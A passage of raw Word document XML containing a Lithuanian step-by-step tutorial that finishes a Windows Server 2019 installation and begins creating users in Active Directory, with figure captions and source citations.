      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="06240932" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Įveskite administratoriaus paskyros slaptažodį ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Baigti“.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Palaukite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C582C63" w14:textId="3966C792" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="320773A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Paspauskite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Ctrl + Alt + Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC07D7D" w14:textId="626F974D" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="321A3702" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Įveskite slaptažodį ir spustelėkite kitą rodyklės mygtuką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„-&gt;“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DAC50" w14:textId="5DC050AF" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="66E88BA6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07022992" wp14:editId="7F67EBE8">
            <wp:extent cx="2678805" cy="2014685"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:docPr id="487609679" name="Picture 48760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609679"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2691467" cy="2024208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194EC34" w14:textId="54B846C0" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00037E6B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="1881C3D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Windows Server 2019 </w:t>
      </w:r>
      <w:r w:rsidR="3637E015" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>darbalaukis</w:t>
      </w:r>
      <w:r w:rsidR="1881C3D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E69A45" w14:textId="010533AB" w:rsidR="1881C3D6" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: </w:t>
      </w:r>
      <w:r w:rsidR="48E39CFB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Koli D. (2019, sausio 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2019 with Desktop Experience (Full Interface) - Clean Installation. </w:t>
      </w:r>
      <w:r w:rsidR="48E39CFB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DSKOLI.</w:t>
      </w:r>
      <w:r w:rsidR="48E39CFB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId215">
        <w:r w:rsidR="48E39CFB" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00562646" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711714C" w14:textId="186C09D3" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36695131" w14:textId="64AFC23C" w:rsidR="00680AA3" w:rsidRPr="005A5C28" w:rsidRDefault="2C6DF743" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kuriame naujus vartotojus</w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BB71B5" w14:textId="77777777" w:rsidR="00680AA3" w:rsidRPr="005A5C28" w:rsidRDefault="00680AA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E1DDC1" w14:textId="75EC6665" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00AB2CF0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Darbo eiga: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD84475" w14:textId="44D4DD69" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">1. Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidR="044243A8" w:rsidRPr="005A5C28">
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Pradėti</w:t>
      </w:r>
      <w:r w:rsidR="5C2E5224" w:rsidRPr="005A5C28">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="490D685B" w:rsidRPr="005A5C28">
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Administravimo įrankiai</w:t>
      </w:r>
      <w:r w:rsidR="5FE1C121" w:rsidRPr="005A5C28">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="0952A6F3" w:rsidRPr="005A5C28">
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="110A671A" w:rsidRPr="005A5C28">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>artotojai ir kompiuteriai</w:t>
      </w:r>
      <w:r w:rsidR="7015E666" w:rsidRPr="005A5C28">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="62889477" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> (Active Directory)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331282D" w14:textId="5B83F518" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ši komanda suaktyvina</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vartotojų</w:t>
      </w:r>
      <w:r w:rsidR="73463456" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Active Directory)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir kompiuterių valdymo pultą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67D2B7" w14:textId="6FDF3D42" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA85F67" w14:textId="787AB4D5" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2. Dešiniuoju pelės mygtuku spustelėkite domeną, prie kurio</w:t>
      </w:r>
      <w:r w:rsidR="00A93F77" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> norite pridėti vartotoją, tada kontekstiniame meniu pasirinkite Naujas → Vartotojas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F3596" w14:textId="220FA1A4" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ši komanda iškviečia „N</w:t>
      </w:r>
      <w:r w:rsidR="3CFD3E22" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">aujas Objektas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="129FAB49" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Vartotojo vedlys</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C4C9B" w14:textId="3F9863AC" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7066AB" w14:textId="32DB9349" w:rsidR="6D6CAC3A" w:rsidRPr="005A5C28" w:rsidRDefault="09F8B324" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE5C00D" wp14:editId="1D14ED36">
            <wp:extent cx="4572000" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="754925386" name="Paveikslėlis 75492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54925386"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId216">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04F608F" w14:textId="68D75B08" w:rsidR="6D6CAC3A" w:rsidRPr="005A5C28" w:rsidRDefault="6D6CAC3A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8 pav. Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D21BA5" w14:textId="77777777" w:rsidR="00171535" w:rsidRPr="005A5C28" w:rsidRDefault="00171535" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: Ramabadran V. (2019, balandžio 11). Windows server 2019 Step-By-Step: Setup Active Directory environment </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>using PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft TechNet. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx#Step_1_Login_as_Local_Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B78FB7" w14:textId="2D75D22F" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719E6C4C" w14:textId="3E0D3EAA" w:rsidR="5C34481E" w:rsidRPr="005A5C28" w:rsidRDefault="097AD577" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ABBF574" wp14:editId="21AC23EC">
            <wp:extent cx="2717254" cy="2309666"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1019227501" name="Paveikslėlis 101922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19227501"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId217">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2717254" cy="2309666"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A3290B" w14:textId="0C198824" w:rsidR="5C34481E" w:rsidRPr="005A5C28" w:rsidRDefault="5C34481E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="29E84B75" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pav. Naujo vartotojo kūrimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D819B" w14:textId="77777777" w:rsidR="00171535" w:rsidRPr="005A5C28" w:rsidRDefault="00171535" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Ramabadran V. (2019, balandžio 11). Windows server 2019 Step-By-Step: Setup Active Directory environment using PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft TechNet. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx#Step_1_Login_as_Local_Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB4ED0" w14:textId="7D50C049" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="081B3B8A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D5C076" w14:textId="78AC5A56" w:rsidR="4769AA37" w:rsidRPr="005A5C28" w:rsidRDefault="3A578DED" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="7CD07496" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="01009F42" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įveskite vartotojo vardą ir pavardę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A484E0" w14:textId="443EF066" w:rsidR="081B3B8A" w:rsidRPr="005A5C28" w:rsidRDefault="0BA24BE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F14C41" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="01009F42" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įveskite vartotojo prisijungimo vardą.</w:t>
      </w:r>
    </w:p>
